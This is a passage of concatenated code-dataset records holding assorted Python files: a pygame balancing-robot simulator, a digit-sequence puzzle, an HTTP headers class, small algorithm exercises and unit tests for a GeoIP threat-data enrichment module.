== 'laptop':\n\t\t\tgen_file = './pkl/gen_laptop_2014_'+str(self.emb_size)+'.npy'\n\t\telse:\n\t\t\tgen_file = './pkl/gen_rest_2016_2_'+str(self.emb_size)+'.npy'\n\n\t\t# gen_file = './pkl/gen_laptop_2014.npy' if self.domain == 'laptop' else './pkl/gen_rest_2016_2.npy'\n\n\t\tif os.path.exists(gen_file):\n\t\t\treturn np.load(gen_file)\n\t\telse:\n\t\t\tmat = np.random.uniform(-1,1,(self.vocab_size, self.gen_size))\n\t\t\tfilename ='/media/wenjh/Ubuntu 16.0/Downloads/glove.6B/glove.6B.'+str(self.emb_size)+'d.txt' \n\t\t\t# fr = open('/media/wenjh/Ubuntu 16.0/Downloads/glove.6B/glove.6B.100d.txt')\n\t\t\tfr = open(filename)\n\t\t\tdata = fr.readlines()\n\t\t\tfor line in data:\n\t\t\t\tline = line.strip()\n\t\t\t\tlistfromline = line.split()\n\t\t\t\tword,vec = listfromline[0], listfromline[1:]\n\t\t\t\tif word in self.word2idx:\n\t\t\t\t\tindex = self.word2idx[word]\n\t\t\t\t\tmat[index] = np.array(list(map(float,vec))).astype(np.float32)\n\t\t\tnp.save(gen_file[:-4], mat)\n\t\t\treturn mat\n\n\n\tdef reset_pointer(self):\n\t\tself.pointer = 0\n\n\tdef random_point(self):\n\t\tidx = np.random.choice(self.train_size)\n\t\tbegin = idx \n\t\tend = idx+1\n\t\tindex = self.permutation[idx]\n\n\t\treturn self.train_sent[begin:end],\\\n\t\t\t\tself.train_sent_tag[begin:end],\\\n\t\t\t\tself.train_mask[begin:end],\\\n\t\t\t\tself.train_labels[begin:end],\\\n\t\t\t\tself.train_cat_labels[begin:end],\\\n\t\t\t\tself.train_tfidf[begin:end],\\\n\t\t\t\tindex\n\n\tdef __next__(self):\n\t\tbegin = self.pointer*self.batch_size\n\t\tend = (self.pointer+1)*self.batch_size\n\t\t# self.train_size = len(self.sent)\n\n\t\tif (self.pointer+1)*self.batch_size >= self.train_size:\n\t\t\tend = 
self.train_size\n\t\t\tself.pointer = 0\n\t\telse:\n\t\t\tself.pointer+=1\n\t\treturn self.train_sent[begin:end],\\\n\t\t\t\tself.train_sent_tag[begin:end],\\\n\t\t\t\tself.train_mask[begin:end],\\\n\t\t\t\tself.train_labels[begin:end],\\\n\t\t\t\tself.train_cat_labels[begin:end],\\\n\t\t\t\tself.train_tfidf[begin:end]\n\n\n\tdef val(self, sample_rate = 0.3):\n\t\t# test_size = self.train_size - 2000\n\t\tval_size = len(self.val_sent)\n\t\tsample_size = int(val_size*sample_rate)\n\n\t\tidx = np.random.choice(range(len(self.val_sent)), sample_size, replace = False)\n\n\n\t\tv_sent \t\t= []\n\t\tv_sent_tag \t= []\n\t\tv_mask \t\t= []\n\t\tv_labels \t= []\n\t\tv_c_labels \t= []\n\t\tv_c_masks \t= []\n\t\tv_tfidf \t= []\n\n\t\texists_dic = {}\n\n\t\tif sample_rate == 1:\n\t\t\t# print('\\n')\n\t\t\tindex = self.permutation[self.train_size:]\n\t\t\treturn [self.val_sent,\\\n\t\t\t\t\tself.val_sent_tag, \\\n\t\t\t\t\tself.val_mask, \\\n\t\t\t\t\tself.val_labels, \\\n\t\t\t\t\tself.val_cat_labels, \\\n\t\t\t\t\tindex,\\\n\t\t\t\t\tself.val_tfidf]\n\n\t\telse:\n\t\t\tindex = []\n\t\t\twhile len(v_sent) < sample_size:\n# [lost in extraction: the remainder of this record and the beginning of the next record\n# (oldprogs/gui-window-attempt/shell.py, per the metadata below); the fragment resumes\n# inside a line-wrapping loop of that file]\n\t\t\tif len(lines[ln]) > wrap:\n\t\t\t\ttoinsert = lines[ln][wrap:]\n\t\t\t\tlines.insert(ln+1,toinsert)\n\t\t\t\tleavebehind = lines[ln][:wrap]\n\t\t\t\tlines[ln] = leavebehind\n\t\t\tln += 1\n\t\t\tif ln == len(lines):\n\t\t\t\tbreak\n\t\treturn lines[-height:]\n\n","sub_path":"oldprogs/gui-window-attempt/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613811597","text":"\"\"\"\nSimple Balancing Robot Simulator\n\"\"\"\n#****************************************************************************\n# make sure starts in a desired screen position each time\nimport os\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (50,30)\n#------------------------------------------------------------\nimport pygame, sys\nimport random\nimport math # for trig\nfrom pygame.locals import *\n\n#---------------------------------------------------\n# to allow compatibility with both python 2 and 3\ntry:\n    xrange\nexcept NameError:\n    xrange = range\n#---------------------------------------------------\n# GRAPHICS CONSTANTS\nSCREEN_SIZE_X = 700\nSCREEN_SIZE_Y = 680\nWHEEL_R = 50 # size in pixels\nGROUND_Y = 600 # size in pixels\nTREE_SIZE_X = 100 # size in pixels\nTREE_SIZE_Y = 250 # size in pixels\n\nFPS = 40\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n\n#PHYSICAL CONSTANTS\nFRAME_MASS = 25.0 # in Kg\nFRAME_I = 1.0/12*FRAME_MASS*(2**2) # moment of inertia of a uniform rod 2m long\nFRAME_L = 1. # in meters\n\nWORLD_SCALE = 100. # 1 meter = 100 pixels\nWORLD_ORIGIN = [50, GROUND_Y - WHEEL_R]\nTIME_dt = 0.001 # 1/iterations per second\nG = 9.8\nW = .1\n\n#-----------------------------------------------------------------------------\ndef realToGraphicCoord(realx, realy):\n    graphicalx = realx*WORLD_SCALE + WORLD_ORIGIN[0]\n    graphicaly = -realy*WORLD_SCALE + WORLD_ORIGIN[1]\n    return [graphicalx, graphicaly]\n\n#-----------------------------------------------------------------------------\nclass PObject():\n    '''\n    CLASS TO MODEL PHYSICAL OBJECT MOTION IN 2D. 
Does not include gravity.\n '''\n def __init__(self, mass=1., I=1., dt=TIME_dt):\n self.mass = mass\n self.I = I\n self.dt = dt\n\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.xdot = 0.0\n self.ydot = 0.0\n self.thetadot = 0.0\n \n def Update(self, forcex, forcey, torque):\n # F = ma; a = F/m\n self.xdot += forcex/self.mass*self.dt\n self.x += self.xdot*self.dt\n\n self.ydot += forcey/self.mass*self.dt - G*self.dt\n self.y += self.ydot*self.dt\n\n self.thetadot += torque/self.I*self.dt\n self.theta += self.thetadot*self.dt\n \n \n#-----------------------------------------------------------------------------\nclass Ball(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([5, 5])\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.pobj = PObject()\n self.pobj.x = 5 # 1 meter\n self.pobj.y = 4.9 #\n self.pobj.xdot = 0 \n self.pobj.ydot = 0 # 4.9 m/sec, should bounce with a period of 1 sec\n self.rect.center = (self.pobj.x, self.pobj.y)\n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.rect = self.image.get_rect()\n self.rect.center = (realToGraphicCoord(self.pobj.x, self.pobj.y))\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def pupdate(self):\n self.pobj.Update(0,0,0)\n if((self.pobj.y < 0) and (self.pobj.ydot < 0)):\n self.pobj.y = 0\n self.pobj.ydot = -self.pobj.ydot\n \n#-----------------------------------------------------------------------------\nclass WheelTest(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY A WHEEL\n Setx(x) - function to set the xposition (__xpos) of the wheel, all other\n graphical state variables are calculated from __xpos\n '''\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"wheel.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (WHEEL_R * 2, WHEEL_R * 2))\n self.image = self.imageMaster\n self.rect = self.image.get_rect()\n self.xpos = 70 \n self.ypos = GROUND_Y - WHEEL_R #for center\n self.angle = 0\n self.rect.center = (self.xpos, self.ypos)\n self.pobj = PObject()\n\n def pupdate(self):\n self.pobj.Update(0,0,10) \n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.angle = self.pobj.theta\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n\n#-----------------------------------------------------------------------------\nclass Wheel(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY A WHEEL\n Setx(x) - function to set the xposition (__xpos) of the wheel, all other\n graphical state variables are calculated from __xpos. 
In \n other words, the rotation is set based on how much it should\n have rolled to reach the given _xpos.\n The wheel is placed on the ground (GROUND_Y).\n '''\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"wheel.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (WHEEL_R * 2, WHEEL_R * 2))\n self.image = self.imageMaster\n self.rect = self.image.get_rect()\n self.xpos = 0 # center x; set externally\n self.ypos = GROUND_Y - WHEEL_R # center y; never changed\n self.angle = 0 # rotation in radians; calculated each update\n self.rect.center = (self.xpos, self.ypos)\n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.angle = (self.xpos/WHEEL_R)\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n#-----------------------------------------------------------------------------\nclass Frame(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY ROBOT FRAME (TREE PART)\n '''\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"tree.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (TREE_SIZE_X,TREE_SIZE_Y))\n self.angle = 0\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.xpos = 0 #for center of mass\n self.ypos = GROUND_Y - WHEEL_R - \\\n TREE_SIZE_Y/2*math.cos(self.angle)\n self.rect.center = (self.xpos, self.ypos)\n\n\n def update(self):\n \"\"\" Update the player's position. \"\"\"\n # Get the current mouse position. This returns the position\n # as a list of two numbers.\n # Set the player x position to the mouse x position\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.ypos = GROUND_Y - WHEEL_R - \\\n TREE_SIZE_Y/2*math.cos(self.angle)\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n\n#-----------------------------------------------------------------------------\nclass Robot(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. 
\"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = 0.1\n self.pobj.x = 2\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def pupdate(self):\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n forcey = numer/denom\n torque = forcey*FRAME_L*math.sin(self.pobj.theta) \n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(0, forcey, torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n\n#-----------------------------------------------------------------------------\nclass RobotBalanced(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = 1\n self.pobj.x = 5\n self.pobj.xdot = 0 # remove\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def pupdate(self):\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n forcey = numer/denom\n torquey = forcey*FRAME_L*math.sin(self.pobj.theta) \n\n theta_delayed = self.pobj.theta #placeholder for later implemented delay\n thetadot_delayed = self.pobj.thetadot #placeholder for later implemented delay\n\n numer = self.pobj.mass*G*FRAME_L*math.sin(theta_delayed) - \\\n self.pobj.mass*(FRAME_L**2)*math.sin(theta_delayed)* \\\n math.cos(theta_delayed)*(thetadot_delayed**2) + \\\n (2*W*thetadot_delayed +W*theta_delayed)* \\\n (self.pobj.I + \n self.pobj.mass*(FRAME_L**2)*(math.sin(theta_delayed)**2))\n denom = 1 + FRAME_L*math.cos(theta_delayed)/(WHEEL_R/100.)\n torqueMotor = -numer/denom\n\n forcex = -torqueMotor / (WHEEL_R/100.)\n torquex = -forcex * FRAME_L * math.cos(self.pobj.theta)\n \n torque = torquex + torquey + torqueMotor\n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(forcex, forcey, torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n#-----------------------------------------------------------------------------\nclass RobotDoubleBalanced(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. 
\"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = -.2\n self.pobj.x = 1\n self.pobj.xdot = 2# initial velocity - remove\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n self.thetaTarget = 0.0\n self.xTarget = 3.\n \n self.torque = 0.\n self.torqueMotor = 0.\n self.torquex = 0.\n self.torquey = 0.\n self.forcex = 0.\n self.forcey = 0.\n \n def pupdate(self):\n xerror = self.pobj.x - self.xTarget\n #if(xerror > .1):\n # self.thetaTarget = -0.01\n #elif(xerror < .1):\n # self.thetaTarget = 0.01\n #self.thetaTarget = -math.atan(0.001*xerror) #- math.atan(0.05*self.pobj.xdot)\n #self.thetaTarget = 0\n self.xTarget = (pygame.mouse.get_pos()[0] - WORLD_ORIGIN[0])/WORLD_SCALE\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n self.forcey = numer/denom\n self.torquey = self.forcey*FRAME_L*math.sin(self.pobj.theta) \n\n theta_delayed = self.pobj.theta #placeholder for later implemented delay\n thetadot_delayed = self.pobj.thetadot #placeholder for later implemented delay\n \n thetaError = theta_delayed - self.thetaTarget \n\n numer = self.pobj.mass*G*FRAME_L*math.sin(thetaError) - \\\n self.pobj.mass*(FRAME_L**2)*math.sin(thetaError)* \\\n math.cos(thetaError)*(thetadot_delayed**2) + \\\n (2*W*thetadot_delayed +W*thetaError)* \\\n (self.pobj.I + \\\n self.pobj.mass*(FRAME_L**2)*(math.sin(thetaError)**2))\n denom = 1 + FRAME_L*math.cos(thetaError)/(WHEEL_R/100.)\n self.torqueMotor = -numer/denom + \\\n 0.08*(-xerror) - 0.4*self.pobj.xdot\n\n self.forcex = -self.torqueMotor / (WHEEL_R/100.)\n self.torquex = -self.forcex * FRAME_L * math.cos(self.pobj.theta)\n \n self.torque = self.torquex + self.torquey + self.torqueMotor\n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(self.forcex, self.forcey, self.torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def dump(self):\n print(self.torqueMotor),\n print(self.torquex),\n print(self.torquey),\n print(self.torque),\n print(self.forcex),\n print(self.forcey)\n \n\n#****************************************************************************\n# --- Create the window\n# Initialize Pygame\npygame.init()\n\n\n# Set the height and width of the screen\nscreen = pygame.display.set_mode([SCREEN_SIZE_X, SCREEN_SIZE_Y])\n\n# set up fonts\nbasicFont = pygame.font.SysFont(None, 48)\ntext = basicFont.render('YOU SUCK!', True, WHITE, BLUE)\ntextRect = text.get_rect()\ntextRect.centerx = screen.get_rect().centerx\ntextRect.centery = screen.get_rect().centery\n\n#background_image = pygame.image.load(\"jungle.jpg\").convert()\n\n# --- Sprite lists\n# This is a list of every sprite. 
All blocks and the player block as well.\nall_sprites_list = pygame.sprite.Group()\n\n# List of each block in the game\nblock_list = pygame.sprite.Group()\n\n# List of each bullet\nbullet_list = pygame.sprite.Group()\n\n# Instantiate sprites\nball = Ball()\nall_sprites_list.add(ball)\n\n#wheelTest = WheelTest()\n#all_sprites_list.add(wheelTest)\n\n#robot = Robot()\n#all_sprites_list.add(robot.frame)\n#all_sprites_list.add(robot.wheel)\n#robotBalanced = RobotBalanced()\n#all_sprites_list.add(robotBalanced.frame)\n#all_sprites_list.add(robotBalanced.wheel)\nrobotDoubleBalanced = RobotDoubleBalanced()\nall_sprites_list.add(robotDoubleBalanced.frame)\nall_sprites_list.add(robotDoubleBalanced.wheel)\n\n\n#Loop until the user clicks the close button.\ndone = False\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\nscore = 0\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Event Processing\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Fire a bullet if the user clicks the mouse button\n score = score + 1\n \n # Physics inner loop \n for i in xrange(1,int(1/TIME_dt/FPS)):\n ball.pupdate()\n #robot.pupdate() \n #robotBalanced.pupdate() \n robotDoubleBalanced.pupdate() \n #wheelTest.pupdate()\n # --- Game logic\n # Call the update() method on all the sprites\n all_sprites_list.update()\n robotDoubleBalanced.dump()\n \n # --- Draw a frame\n # Clear the screen\n screen.fill(WHITE)\n #screen.blit(background_image, [0,0])\n pygame.draw.lines(screen, BLACK, False, [(0,GROUND_Y), (SCREEN_SIZE_X,GROUND_Y)], 1)\n\n # Draw all the spites\n all_sprites_list.draw(screen) \n \n # Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 20 frames per second\n clock.tick(FPS)\n\nscreen.blit(text, textRect)\npygame.display.update()\npygame.time.delay(500)\n\npygame.quit()","sub_path":"pc/simulator/pyPhysicsSim/pyPhysicsSim.py","file_name":"pyPhysicsSim.py","file_ext":"py","file_size_in_byte":16934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"642581150","text":"\"\"\"\n2. Infinite sequence\nTake the infinite digit sequence formed by gluing together consecutive positive integers: \nS = 123456789101112131415...\nFind the first occurrence of a given subsequence A in the infinite sequence S (numbering starts at 1).\n\nThe program must read data from stdin and write the answers to stdout.\n\nSample input (one subsequence per line, maximum subsequence length is 50 characters):\n6789\n111\n\nSample output:\n6\n12\n\"\"\"\n\"\"\"\nNOTES.\n1. Where a number first appears in the infinite sequence is determined by the number of digits in that number. Looking at \nthe sequence itself, the pattern is: the first 9 numbers (1-9) contain 1 digit each, the next 90 numbers (10-99) \ncontain 2 digits each, and so on. So, to find the first occurrence, determine how many ones, tens, \nhundreds, etc. make up the number, then multiply each amount by the corresponding digit count.\n2. The sequence should be generated from the possible combinations of the input data.\n3. Possible variants of the sequence:\n \n # First digit - 9\n 79, 80, 81, 82 --> 98081\n 89, 90, 91, 92 --> 99091\n 129, 130, 131 --> 9130131\n 1859, 1860, 1861 --> 918601861\n \n # First digit - 0\n 20, 21, 22, 23 --> 02122\n 1250, 1251, 1252 --> 012511252\n\"\"\"\n\n\ndef find_first_ins(number):\n first_ins = 0\n temp = 0\n temporary_numb = 0\n for i in range(len(str(number))-1):\n temporary_numb += 9*(10**i)\n temp += 9*(10**i)*(i+1)\n val = i\n temp += (val+2)*(number - temporary_numb-1)+1\n\n print('the clever way - ' + str(temp))\n\ndef generate_seq(number=''):\n number_seq = 1\n final_string = ''\n while True:\n final_string += str(number_seq)\n number_seq += 1\n if number in final_string:\n # print(final_string)\n print('brute force - ' + str(final_string.find(str(number)) + 1))\n return final_string.find(str(number))+1\n\nx = int(input())\nfind_first_ins(x)\ngenerate_seq(str(x))\n\n","sub_path":"TASK_2.py","file_name":"TASK_2.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"376660520","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nfrom tachyonic.neutrino.utils.general import is_byte_string\nlog = logging.getLogger(__name__)\n\n\nclass Headers(object):\n def __init__(self,request=True):\n self.data = {}\n self.request = request\n\n def __setitem__(self, key, value):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n self.data[key] = value\n\n def __getitem__(self, key):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n if key in self.data:\n return self.get(key)\n else:\n raise KeyError(key)\n\n def __delitem__(self, key):\n try:\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n del self.data[key]\n except KeyError:\n pass\n\n def __contains__(self, key):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n return key in self.data\n\n def __iter__(self):\n return iter(self.data)\n\n def __len__(self):\n return len(self.data)\n\n def __repr__(self):\n return repr(self.data)\n\n def __str__(self):\n return str(self.data)\n\n def update(self, headers):\n self.data.update(headers)\n\n def get(self, key, default=None):\n try:\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n if is_byte_string(self.data[key]):\n return self.data[key]\n else:\n return str(self.data[key]).encode('utf-8')\n except KeyError:\n return default\n","sub_path":"tachyonic/neutrino/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"232687989","text":"class Solution:\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n ans = 0\n for i,row in enumerate(grid):\n for j,val in enumerate(row):\n if val:\n ans += 4\n if i>0 and grid[i-1][j]: ans -= 2\n if j>0 and grid[i][j-1]: ans -= 2\n return ans\nval = [[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]\nprint(Solution().islandPerimeter(val))","sub_path":"463. Island Perimeter.py","file_name":"463. Island Perimeter.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"187224720","text":"import sys\nex = input()\ncount = 0\nans=\"\"\nfor i in range(len(ex)-1,-1,-1):\n if(ex[i] == '<'):\n count += 1\n elif(count > 0):\n count -= 1\n else:\n ans += ex[i]\n\n\nprint(ans[::-1])\n","sub_path":"Kattis/backspace.py","file_name":"backspace.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"263135385","text":"# First Idea:\n# - Regex replace ' ' with '%20'\n\n# O(n)\nimport re\ndef URLify(string):\n return re.sub(' ', \"%20\", string)\n\n\n# Second Idea:\n# - Iterate through and replace ' ' with '%20'\n\n# O(n)\ndef URLify_2(string):\n out = []\n for letter in string:\n if letter == ' ':\n out.append('%20')\n else:\n out.append(letter)\n return ''.join(out)\n\n\n\na = \"this is a test\"\nb = \"this is test\"\n\nprint(URLify(a))\nprint(URLify(b))\n\nprint(URLify_2(a))\nprint(URLify_2(b))","sub_path":"CTCI-6th-Edition/chapter-01/1.3-URLify.py","file_name":"1.3-URLify.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"470338768","text":"# --====================================================--\n# Threat Information Management System (T.I.M.S.)\n# Download Agent\n# Group 2 - Fall 2018\n# Darrell Miller, Doug Peck, Raymond Schmalzl, Trung Nguyen\n#\n# --====================================================--\n#\n# Unit Tests for GeoIP Enrichment Class\n# \nimport unittest\nimport os\nimport geoip2\nfrom shutil import copyfile\nfrom DataEnricher import *\nfrom UnitTest import Test_DataEnricher\n\nclass Test_LocateGeoIP(Test_DataEnricher):\t\n\n\t# Test DB Location Adjustment Methods\n\tdef test_dbloc_updates(self):\n\t\t# Pull Starting Locations\n\t\tasnDBloc = self.enrichObj.asnDBloc \n\t\tcityDBloc = self.enrichObj.cityDBloc \n\t\tcountryDBloc = self.enrichObj.countryDBloc\n\t\t# Change Locations\n\t\tself.enrichObj.set_asnDBloc('test')\n\t\tself.enrichObj.set_cityDBloc('test')\n\t\tself.enrichObj.set_countryDBloc('test')\n\t\t# Test for change\n\t\tself.assertNotEqual(self.enrichObj.asnDBloc,asnDBloc)\n\t\tself.assertNotEqual(self.enrichObj.cityDBloc,cityDBloc)\n\t\tself.assertNotEqual(self.enrichObj.cityDBloc,cityDBloc)\n\n\t# # Test the socket response from the Host IP modules\n\t# def test_searchASN(self):\n\t# \t# Open the Reader\n\t# \tself.enrichObj.reader = geoip2.database.Reader(self.enrichObj.asnDBloc)\n\t# \t# Pull Data\n\t# \tself.enrichObj.extractFromDB()\n\t# \t# Reduce the number of threats for speed\n\t# \tself.prune_threats()\n\t# \t# Try searching for ASN Information\n\t# \tcount = 0\n\t# \tfor item in self.enrichObj.recordedThreats:\n\t# \t\tip = self.enrichObj.searchASN(item)\n\t# \t\tif not \" - Failure\" in ip[0]:\n\t# \t\t\tcount += 1\n\t# \t#Close the Reader\n\t# \tself.enrichObj.reader.close()\n\t# \t# Check for failure\n\t# \tself.assertTrue(count > 0)\n\n\t# # Test the socket response from the Host IP modules\n\t# def test_searchCity(self):\n\t# \t# Open the Reader\n\t# \tself.enrichObj.reader = geoip2.database.Reader(self.enrichObj.cityDBloc)\n\t# \t# Pull Data\n\t# \tself.enrichObj.extractFromDB()\n\t# \t# Reduce the number of threats for speed\n\t# \tself.prune_threats()\n\t# \t# Try searching for City Information\n\t# \tcount = 0\n\t# \tfor item in self.enrichObj.recordedThreats:\n\t# \t\tip = self.enrichObj.searchASN(item)\n\t# \t\tif not \" - Failure\" in ip[0]:\n\t# \t\t\tcount += 1\n\t# \t#Close the Reader\n\t# \tself.enrichObj.reader.close()\n\t# \t# Check for failure\n\t# \tself.assertTrue(count > 0)\n\n\t# Test the HostIP Modules Enrichment Method\n\tdef test_GeoIP_enrichment(self):\n\t\t# Pull Data\n\t\tself.enrichObj.extractFromDB()\n\t\t# Reduce the number of threats for speed\n\t\tself.prune_threats()\n\t\t# Empty Existing Field\n\t\tself.empty_key('enriched')\n\t\t# Enrich Data\n\t\tself.enrichObj.enrichData()\n\t\t# Count the number of properly enriched entires\n\t\tcount = 0\n\t\tfor item in self.enrichObj.recordedThreats:\n\t\t\tif self.enrichObj.recordedThreats[item]['enriched'] == 1:\n\t\t\t\tcount += 1\n\t\t# Check tha every entry was updates\n\t\tself.assertEqual(len(self.enrichObj.recordedThreats),count)\n\n\t#Start by creating an export instance \n\tdef setUp(self):\n\t\tself.enrichObj = LocateGeoIP()\n\t\tself.enrichObj.sqlString = \"SELECT * FROM 'RecordedThreatsDB' \"\n\t\tcopyfile('./Database/Threats.sqlite','./UnitTest/UnitTestThreats.sqlite')\n\t\tself.enrichObj.set_sqlDBloc('./Database/UnitTestThreats.sqlite')\n\n\n","sub_path":"Backend_Processor/DownloadAgent/UnitTest/Test_LocateGeoIP.py","file_name":"Test_LocateGeoIP.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
